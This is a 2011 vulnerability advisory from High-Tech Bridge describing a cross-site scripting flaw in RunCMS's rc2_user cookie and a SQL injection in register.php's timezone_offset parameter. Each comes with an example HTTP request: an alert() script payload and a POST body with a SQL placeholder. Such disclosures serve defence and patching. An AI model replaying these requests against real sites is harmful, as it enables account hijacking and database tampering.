Multiple Vulnerabilities in RunCMS

2011-01-27T00:00:00
ID HTB22820
Type htbridge
Reporter High-Tech Bridge
Modified 2011-01-27T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in RunCMS which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting (XSS) vulnerability in RunCMS
The vulnerability exists due to input sanitation error in the "rc2_user" cookie in user.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
GET /user.php HTTP/1.1
Cookie: rc2_user='><script>alert("XSS")%3b</script>

2) SQL injection vulnerability in RunCMS
The vulnerability exists due to input sanitation errors in the "timezone_offset" parameter in register.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
POST /register.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 299
uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address= nope&zip_code=123&town =nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL _CODE_HERE&url=http%3A%2 F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verif y_text=&verify_crc=&keys tring=368483&op=finish